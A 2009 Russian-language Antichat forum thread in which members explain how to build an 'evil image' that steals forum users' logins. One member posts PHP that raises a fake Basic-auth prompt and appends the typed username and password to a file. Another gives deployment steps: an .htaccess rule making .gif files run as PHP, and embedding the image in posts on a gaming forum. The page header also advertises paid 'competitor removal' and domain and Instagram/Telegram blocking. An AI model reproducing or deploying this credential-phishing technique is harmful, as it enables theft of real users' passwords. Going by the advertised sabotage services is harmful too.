Форум АНТИЧАТ - злая картинка на ipb

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
злая картинка на ipb

Опции темы

Поиск в этой теме

Опции просмотра

злая картинка на ipb

16.08.2009, 12:32

snipero4ek

Постоянный

Регистрация: 27.07.2008

Сообщений: 302

Провел на форуме:
1724236

Репутация: 50

злая картинка на ipb

При заходе на http://forum.4game.ru/index.php?showtopic=415641 выходит окно авторизации, сама картинка - http://www.i4game.hut.ru/image/sign.jpg(была похожая бага на ucoze), есть вопрос как это сделать?

16.08.2009, 12:34

_==wolf==_

Участник форума

Регистрация: 29.05.2008

Сообщений: 181

Провел на форуме:
979048

Репутация: 101

Отправить сообщение для _==wolf==_ с помощью ICQ

ухх пипец юзай гугл мальчик там все написано. статей 7 видел точно как это делается причём я даже не искал.

16.08.2009, 12:40

_==wolf==_

Участник форума

Регистрация: 29.05.2008

Сообщений: 181

Провел на форуме:
979048

Репутация: 101

первый попавшийся

PHP код:


		
			
<?php  

      if (!isset($_SERVER['PHP_AUTH_USER'])) {  

        header("WWW-Authenticate: Basic realm="Login in"");  

        header("HTTP/1.0 401 Unauthorized");  

        echo "Отмена";  

        exit;  

      } else {  

        $fh = fopen('passwords.txt', "a+"); 

        $text = $_SERVER['PHP_AUTH_USER'].':'.$_SERVER['PHP_AUTH_PW'];  

        fwrite($fh,$text); 

        fclose($fh); 

        echo "<p>Привет: {$_SERVER['PHP_AUTH_USER']}.</p>";  

        echo "<p>Твой пароль {$_SERVER['PHP_AUTH_PW']}</p>";  

      }  



?>

тему забанить, автора закрыть!

17.08.2009, 18:32

DanST

Новичок

Регистрация: 23.05.2007

Сообщений: 22

Провел на форуме:
70057

Репутация: -8

Цитата:

Сообщение от _==wolf==_

первый попавшийся

PHP код:


		
			
<?php  

      if (!isset($_SERVER['PHP_AUTH_USER'])) {  

        header("WWW-Authenticate: Basic realm="Login in"");  

        header("HTTP/1.0 401 Unauthorized");  

        echo "Отмена";  

        exit;  

      } else {  

        $fh = fopen('passwords.txt', "a+"); 

        $text = $_SERVER['PHP_AUTH_USER'].':'.$_SERVER['PHP_AUTH_PW'];  

        fwrite($fh,$text); 

        fclose($fh); 

        echo "<p>Привет: {$_SERVER['PHP_AUTH_USER']}.</p>";  

        echo "<p>Твой пароль {$_SERVER['PHP_AUTH_PW']}</p>";  

      }  



?>

тему забанить, автора закрыть!

Йа чайнег)) что должно есчо быть?

17.08.2009, 19:04

POS_troi

Познавший АНТИЧАТ

Регистрация: 01.12.2006

Сообщений: 1,769

Провел на форуме:
3718311

Репутация: 1118

Отправить сообщение для POS_troi с помощью ICQ

неужели так сложно юзать поиск =/

за месяц уже в третий раз сюда посылаю

http://forum.antichat.ru/showthread.php?p=457280

18.08.2009, 10:47

DanST

Новичок

Регистрация: 23.05.2007

Сообщений: 22

Провел на форуме:
70057

Репутация: -8

Цитата:

Сообщение от POS_troi

неужели так сложно юзать поиск =/

за месяц уже в третий раз сюда посылаю

http://forum.antichat.ru/showthread.php?p=457280

Меня интересует именно то как сотварить сие, а не обычный сниффак

18.08.2009, 11:18

wolmer

Постоянный

Регистрация: 12.05.2009

Сообщений: 395

Провел на форуме:
4761503

Репутация: 229

Цитата:

Сообщение от POS_troi

неужели так сложно юзать поиск =/

за месяц уже в третий раз сюда посылаю

http://forum.antichat.ru/showthread.php?p=457280

каким хером тут сниффер?

DanST, пиши это в php код, к примеру в файл под названием smile.php, на сервере,
дальше создавай там файл .htaccess, и вставляй в него след.

Код:

AddType application/x-httpd-php .gif

Как вставил, сохраняй и иди на форуме геймеров и вставляй в посте типа этого

[IMG*]http://site.ru/smile.gif[/IMG*] (без звездочек)

Вот и все, по идее должна вылезти бейзик авторизация

18.08.2009, 15:57

DanST

Новичок

Регистрация: 23.05.2007

Сообщений: 22

Провел на форуме:
70057

Репутация: -8

Цитата:

Сообщение от wolmer

Код:

AddType application/x-httpd-php .gif

Пишет нот фоунд на локалхосте, а на хостингах вызывает 500

Последний раз редактировалось DanST; 18.08.2009 в 16:21..

18.08.2009, 16:28

Kusto

Moderator - Level 7

Регистрация: 04.02.2007

Сообщений: 554

Провел на форуме:
7518056

Репутация: 1089

Отправить сообщение для Kusto с помощью ICQ

этому баяну 100 лет (во избежании бана не вставляю сюда картинку) поэтому кому интересно оставляю ввиде ссылки http://erorr.phpnet.us/bazik/smile.gif кроме того здесь идет проверка кукисов- т е при повторном заходе увидите просто смайлик

#10

18.08.2009, 17:08

DanST

Новичок

Регистрация: 23.05.2007

Сообщений: 22

Провел на форуме:
70057

Репутация: -8

PHP код:


		
			
$result = mysql_query("

SELECT * FROM person WHERE 

login='". preg_replace("/[^\\w_-]/","",$PHP_AUTH_USER). "' 

AND pass='". md5($PHP_AUTH_PW). "'");

if (@mysql_num_rows($result)!=1) {

    header("WWW-Authenticate: Basic realm=\"User area\"");

    header("HTTP/1.0 401 Unauthorized");

    print("Чтобы войти в пользовательскую часть сайта, надо

           ввести имя и пароль.");

    exit();

    };

$user_row = mysql_fetch_array($result);

Как юзать????

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
IPB vs vBulletin....	Zinus	PHP, PERL, MySQL, JavaScript	50	18.01.2009 20:35
скрипт распознавания форума	genom--	Форумы	22	31.12.2008 15:06
Ipb 2.1.3 и в Ipb 2.1.5 можно хешь расшифровать?	[6][P][A][T]	Расшифровка хешей	4	07.06.2006 17:23
Возвожно ли защитить форум IPB 2.0.4 Trial или IPB 1.3 final от взлома эксплоитом?	CTTAPTAK	Форумы	1	10.10.2005 21:46

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход